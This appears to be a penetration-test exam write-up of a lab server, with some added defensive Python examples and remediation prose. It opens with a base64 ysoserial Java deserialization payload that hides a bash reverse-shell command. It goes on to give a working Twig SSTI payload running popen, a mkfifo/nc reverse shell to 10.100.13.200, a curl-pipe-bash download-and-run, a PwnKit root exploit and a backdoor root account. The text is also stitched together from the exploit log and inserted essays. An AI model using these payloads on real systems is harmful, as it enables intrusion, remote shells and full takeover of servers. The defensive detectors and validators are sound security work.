oZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGV
yYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQA
IaXRlcmF0b3IBADVMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yOwEAB2hhbmRsZXI
BAEFMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEAClNvdXJ
jZUZpbGUBAAxHYWRnZXRzLmphdmEMAAoACwcAKAEAM3lzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV
0UGF5bG9hZAEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQ
BABRqYXZhL2lvL1NlcmlhbGl6YWJsZQEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV
4Y2VwdGlvbgEAH3lzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMBAAg8Y2xpbml0PgEAEWphdmEvbGFuZy9SdW50aW1lBwA
qAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwwALAAtCgArAC4BAGFiYXNoIC1jIHtlY2hvLFltRnphQ0F0YVN
BK0ppQXZaR1YyTDNSamNDOHhNQzR4TURBdU1UTXVNakF6THpnNE9EZ2dNRDRtTVE9PX18e2Jhc2U2NCwtZH18e2Jhc2gsLWl9CAA
wAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwwAMgAzCgArADQBAA1TdGFja01hcFRhYmx
lAQAceXNvc2VyaWFsL1B3bmVyNjE1MjM3MDExNzUxOAEAHkx5c29zZXJpYWwvUHduZXI2MTUyMzcwMTE3NTE4OwAhAAIAAwABAAQ
AAQAaAAUABgABAAcAAAACAAgABAABAAoACwABAAwAAAAvAAEAAQAAAAUqtwABsQAAAAIADQAAAAYAAQAAAC8ADgAAAAwAAQAAAAU
ADwA4AAAAAQATABQAAgAMAAAAPwAAAAMAAAABsQAAAAIADQAAAAYAAQAAADQADgAAACAAAwAAAAEADwA4AAAAAAABABUAFgABAAA
AAQAXABgAAgAZAAAABAABABoAAQATABsAAgAMAAAASQAAAAQAAAABsQAAAAIADQAAAAYAAQAAADgADgAAACoABAAAAAEADwA4AAA
AAAABABUAFgABAAAAAQAcAB0AAgAAAAEAHgAfAAMAGQAAAAQAAQAaAAgAKQALAAEADAAAACQAAwACAAAAD6cAAwFMuAAvEjG2ADV
XsQAAAAEANgAAAAMAAQMAAgAgAAAAAgAhABEAAAAKAAEAAgAjABAACXVxAH4AIwAAAdTK/rq%252bAAAAMgAbCgADABUHABcHABg
HABkBABBzZXJpYWxWZXJzaW9uVUlEAQABSgEADUNvbnN0YW50VmFsdWUFceZp7jxtRxgBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQA
PTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAA0ZvbwEADElubmVyQ2xhc3NlcwEAJUx5c29zZXJ
pYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJEZvbzsBAApTb3VyY2VGaWxlAQAMR2FkZ2V0cy5qYXZhDAAKAAsHABoBACN5c29zZXJ
pYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJEZvbwEAEGphdmEvbGFuZy9PYmplY3QBABRqYXZhL2lvL1NlcmlhbGl6YWJsZQEAH3l
zb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAAAgAIAAEAAQAKAAsAAQAMAAAALwA
BAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAA8AA4AAAAMAAEAAAAFAA8AEgAAAAIAEwAAAAIAFAARAAAACgABAAIAFgAQAAlwdAA
EUHducnB3AQB4dXIAEltMamF2YS5sYW5nLkNsYXNzO6sW167LzVqZAgAAeHAAAAABdnIAHWphdmF4LnhtbC50cmFuc2Zvcm0uVGV
tcGxhdGVzAAAAAAAAAAAAAAB4cHNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9
sZHhwP0AAAAAAAAB3CAAAABAAAAAAeHh2cgASamF2YS5sYW5nLk92ZXJyaWRlAAAAAAAAAAAAAAB4cHEAfgAu&action=import&
import=Try HTTP/1.1
Host: blog.terahost.exam
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://blog.terahost.exam/9c717baeeca3a2c67f2c7797c96292ca/fetch.php
Cookie: PHPSESSID=kqopb0sfkdd639inprorlla131; auth=Ti8ra1RvUVBHd25HV3hydGFpZW1OQlExeFo0dW5zNnlVa1dSV
244NmI4NlJ1ZnNLdGVydUNCYTJCNlBlT054MWZhL0tUQmNEVnhtcWY2MTd6WUswUDlXS01BU3NZZz09
Upgrade-Insecure-Requests: 1
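
A defender reviewing access logs would want to catch a request like the one above before it reaches the Java service. The following detection routine is an added example (not part of this report or the tested application): it takes an HTTP request line, undoes repeated URL encoding (the payload above was %25-encoded so that the SSRF hop would forward a literal '+'), follows the nested URL handed to the fetcher, and flags any parameter whose value base64-decodes to a Java serialization stream (magic bytes AC ED 00 05), listing class names from the gadget libraries the payloads above rely on. The request-line shape, the parameter names and the sample stream are assumptions; the sample is constructed here with only the magic and a class descriptor, not a working gadget chain.

```python
"""Detect serialized Java objects carried in request parameters (added example)."""
import base64
import re
from urllib.parse import parse_qsl, quote, unquote, urlsplit

JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"

# Class-name prefixes from the gadget libraries used by the payloads above
# (commons-collections, commons-beanutils, TemplatesImpl).
SUSPICIOUS_PREFIXES = (
    "org.apache.commons.collections",
    "org.apache.commons.beanutils",
    "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
)

# Dotted Java class names appear as ASCII inside TC_CLASSDESC records.
CLASS_NAME_RE = re.compile(rb"(?:[A-Za-z_$][\w$]*\.){2,}[A-Za-z_$][\w$]*")


def decode_layers(value, max_rounds=3):
    """Percent-decode until the value stops changing (bounded number of rounds)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def maybe_java_stream(value):
    """Return the raw bytes if value is base64 of a Java serialization stream, else None."""
    text = decode_layers(value).strip().replace(" ", "+")  # '+' may have become a space
    if not text.startswith("rO0AB"):       # base64 of AC ED 00 0x: cheap pre-filter only
        return None
    text += "=" * (-len(text) % 4)         # restore padding stripped in transit
    try:
        raw = base64.b64decode(text)
    except ValueError:                     # binascii.Error is a ValueError
        return None
    return raw if raw.startswith(JAVA_SERIAL_MAGIC) else None


def suspicious_classes(raw):
    """Class names in the stream that belong to known gadget libraries."""
    names = {m.group().decode("ascii") for m in CLASS_NAME_RE.finditer(raw)}
    return sorted(n for n in names if n.startswith(SUSPICIOUS_PREFIXES))


def _scan_url(url, prefix, depth, findings, max_depth=3):
    if depth > max_depth:
        return
    for key, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        name = prefix + key
        raw = maybe_java_stream(value)
        if raw is not None:
            findings.append((name, suspicious_classes(raw)))
        elif "?" in value:
            # A URL passed to a fetcher (the SSRF hop): inspect its query as well.
            _scan_url(value, name + ">", depth + 1, findings, max_depth)


def find_java_serialized(request_line):
    """Return [(parameter path, [gadget class names]), ...] for an HTTP request line."""
    parts = request_line.split(" ")
    target = parts[1] if len(parts) >= 2 and parts[0].isupper() else request_line
    findings = []
    _scan_url(target, "", 0, findings)
    return findings


def build_sample_request():
    """Constructed request in the shape of the one above: a double-encoded stream
    with a commons-collections class descriptor, nested inside ?url=."""
    class_name = b"org.apache.commons.collections.map.LazyMap"
    stream = JAVA_SERIAL_MAGIC + b"sr" + len(class_name).to_bytes(2, "big") + class_name + b"\x00" * 8
    inner = "127.0.0.1:1337/?data=" + quote(base64.b64encode(stream).decode(), safe="")
    return "GET /fetch.php?url=" + quote(inner, safe="") + "&action=import HTTP/1.1"


if __name__ == "__main__":
    for line in (build_sample_request(),
                 "GET /fetch.php?url=http%3A%2F%2Fimages.example.com%2Flogo.png HTTP/1.1"):
        print(line[:60] + "...", "->", find_java_serialized(line))
```

The "rO0AB" prefix is only a pre-filter: it covers base64 of AC ED 00 04 through 07, so the decoded bytes are checked against the full magic before anything is reported. Class names are extracted from the raw stream rather than from a schema, which keeps the check cheap enough to run on a proxy or log pipeline.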

Opened a netcat listener on port 8888 on my Kali with the following command:

nc -lvnp 8888

After executing in Burp I got the response that data.php was saved and that the data was
deserialized!
Also, checking the terminal with the listener on port 8888, I got the FIRST SHELL:

Now let's see the other open port, 5000.


Changing the port in the request again; I saw earlier that I have TWIG SSTI on it, and already explained
how.
Time for the second shell to accomplish my objectives!

Trying a whoami command too:

127.0.0.1:5000/?name={{config.__class__.__init__.__globals__['os'].popen('whoami').read()}}

And got a hit, I am elsuser.

From the above shell where I was root, I saw that elsuser is a user on the machine!
Let's see if I can catch the second shell now.
So, we are executing commands as elsuser.

Templates should not be generated based on user-controlled input. Instead, pass user input as
template parameters after sanitizing it to eliminate undesirable and dangerous characters prior to
processing. This reduces the likelihood of your templates being compromised by malicious
attacks.

If permitting certain high-risk characters is necessary for specific template attributes, assume that
executing harmful code is unavoidable. In such cases, confining the template environment within a
Docker container can be a safer alternative. Utilizing Docker's security features, you can create a
secure setting that curtails potential malicious activities.

Like I saw in the labs of the INE training for this course, first of all I need to create a file and
host it on my Kali. I will call that file shell2.sh, and its content is the following:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.100.13.200 1313 >/tmp/f

I will host it with the Python HTTP server:

python3 -m http.server 80

Open a listener on port 1313:

nc -lvnp 1313

Then I will put this in the request and send it:

127.0.0.1:5000/?name={{config.__class__.__init__.__globals__['os'].popen('curl${IFS}10.100.13.200:8081/shell2.sh|bash').read()}}

I got the shell!


Now stabilising it with python3:

which python3

python3 -c 'import pty; pty.spawn("/bin/bash")'

To prevent server-side template injection, it's best to avoid letting users modify or submit new
templates, but this may not always be feasible due to operational needs. A simple method for
minimizing the risk of such vulnerabilities is to use a "logic-less" template engine like Mustache,
unless absolutely required. Keeping logic and presentation separate can significantly lessen the
chances of severe template-based attacks. Additionally, executing user code in a restricted
environment with potentially hazardous modules and functions removed can help, although
sandboxing untrusted code can be challenging and susceptible to circumvention.
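
The two remediation passages above (pass user input as a template parameter after sanitising it; prefer a logic-less engine) come down to one rule: user input is data, never template source. The block below is an added example, not code from this report or from the tested application, written against Python's standard-library string.Template as a stand-in logic-less engine so that it runs without any web framework. It cannot execute commands the way the {{...}} payload above does, but it can expand placeholders, which is enough to show the difference: the "unsafe" function concatenates the user's name into the template and leaks a server-side value, the "safe" function renders the same name as a parameter and leaves it inert. The context values and the allow-list for names are assumptions.

```python
"""Template source vs. template data, with a logic-less engine (added example)."""
import re
from string import Template

# Hypothetical server-side context visible to templates (constructed values).
SERVER_CONTEXT = {"secret_key": "constructed-secret-value", "app_name": "blog"}

# Allow-list for a display name: letters, digits, spaces and a little punctuation.
# Template syntax characters such as { } $ % are deliberately not on the list.
NAME_RE = re.compile(r"^[\w .,'-]{1,64}$")


def is_acceptable_name(value):
    """Sanitisation step from the text: reject anything outside the allow-list."""
    return bool(NAME_RE.fullmatch(value))


def render_unsafe(user_input):
    """Anti-pattern: user input is concatenated into the template SOURCE, so any
    placeholder syntax it contains is interpreted by the engine."""
    template = Template("Hello " + user_input + "!")
    return template.safe_substitute(SERVER_CONTEXT)


def render_safe(user_input):
    """Fix: the template source is fixed; user input is passed as the VALUE of the
    $name placeholder, so the engine never parses it as syntax."""
    template = Template("Hello $name!")
    return template.safe_substitute(SERVER_CONTEXT, name=user_input)


def greet(user_input):
    """Full handler: allow-list the input first, then render it as data."""
    if not is_acceptable_name(user_input):
        return "Hello stranger!"
    return render_safe(user_input)


if __name__ == "__main__":
    for probe in ("Bob", "$secret_key", "{{7*7}}"):
        print(repr(probe), "unsafe:", render_unsafe(probe), "| safe:", greet(probe))
```

With a full-featured engine the same concatenation is what turns a name field into the command execution shown above; the fix is the same shape in any engine (a fixed template plus a context dictionary), and the allow-list is a second layer for the cases where the rendered value must stay plain text.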

Let's enumerate more and see if I can get root on the machine...

Found that the version is old and vulnerable to the PwnKit exploit.

So, downloading PwnKit on my Kali from https://github.com/ly4k/PwnKit

curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit

Hosted it on my own Kali Linux:

python3 -m http.server 8081

Downloaded it on the target after going to the "tmp" folder, gave it permission to run, then ran it:

wget http://10.100.13.200:8081/PwnKit

chmod +x PwnKit

./PwnKit

Bum → root!!

Ran id and I see I have even more privileges than in the first shell I had!
Trying to add a new user and see if I can SSH to the target with the new user:

adduser examhack --ingroup root

With the password Test123!

Now checking to see if I can SSH and it worked!

ssh examhack@10.100.13.34

That's the third shell. For this exploit I strongly recommend an urgent update.

To prevent response data from leaking to the attacker, you must ensure that the received response is as
expected. Under no circumstances should the raw response body from the request sent by the server be
delivered to the client.

The most robust way to avoid server-side request forgery (SSRF) is to whitelist the hostname (DNS name)
or IP address that your application needs to access. If a whitelist approach does not suit you and you
must rely on a blacklist, it is important to validate user input properly. For example, do not allow
requests to endpoints with private (non-routable) IP addresses. However, in the case of a blacklist,
the correct mitigation to adopt will vary from application to application. In other words, there is no
universal fix to SSRF because it highly depends on application functionality and business requirements.
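
Both SSRF remediation passages in this report (the one after the port scan and the one just above) ask for the same control: an allow-list of schemes and hosts for the server-side fetcher, with private and loopback addresses refused. The validator below is an added example, not code from this report or from the tested application, showing what that check looks like in front of a feature such as fetch.php. The allow-listed hostnames, ports and schemes are assumptions; the rejected inputs mirror the request shapes seen above (a scheme-less 127.0.0.1 target, file://, gopher://, a non-standard port).

```python
"""Allow-list URL validation for a server-side fetcher (added example)."""
import ipaddress
from urllib.parse import urlsplit

# Hypothetical allow-list: the hosts, schemes and ports the fetch feature legitimately needs.
ALLOWED_HOSTS = frozenset({"images.example.com", "feeds.example.com"})
ALLOWED_SCHEMES = frozenset({"http", "https"})
ALLOWED_PORTS = frozenset({80, 443})


def is_public_ip_literal(host):
    """True if host is a globally routable IP literal, or not an IP literal at all
    (hostnames are judged by the allow-list instead)."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return True
    return ip.is_global   # False for loopback, private, link-local, multicast, reserved


def validate_fetch_url(url, allowed_hosts=ALLOWED_HOSTS):
    """Return (True, "ok") if url may be fetched, else (False, reason).

    Requires an absolute URL with an allowed scheme, no credentials in the URL,
    a hostname on the allow-list, a permitted port and, as defence in depth
    against a misconfigured allow-list, no non-public IP literal.
    """
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, "scheme not allowed: " + (parts.scheme or "(none)")
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL are not allowed"
    host = (parts.hostname or "").lower()
    if not host:
        return False, "missing host"
    try:
        port = parts.port
    except ValueError:
        return False, "invalid port"
    port = port or (443 if scheme == "https" else 80)
    if host not in allowed_hosts:
        return False, "host not on allow-list: " + host
    if port not in ALLOWED_PORTS:
        return False, "port not allowed: " + str(port)
    if not is_public_ip_literal(host):
        return False, "non-public address: " + host
    return True, "ok"


if __name__ == "__main__":
    for candidate in ("http://images.example.com/logo.png",
                      "127.0.0.1:1337/?data=rO0AB",
                      "file:///etc/passwd",
                      "gopher://images.example.com/"):
        print(candidate, "->", validate_fetch_url(candidate))
```

The check is on the URL only: the HTTP client behind it must also refuse to follow redirects to hosts that were not validated and should pin the address it resolved for the allow-listed name, otherwise a DNS answer can still point the request at an internal service. Pair this with the response rule stated above: relay only the fields the feature needs, never the raw body.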
That being written, I fully compromised the target and achieved my objectives by showing the flag, XSS,
SSTI, TWIG, 3 full shells, Java deserialization and more.

Thank you for your time.
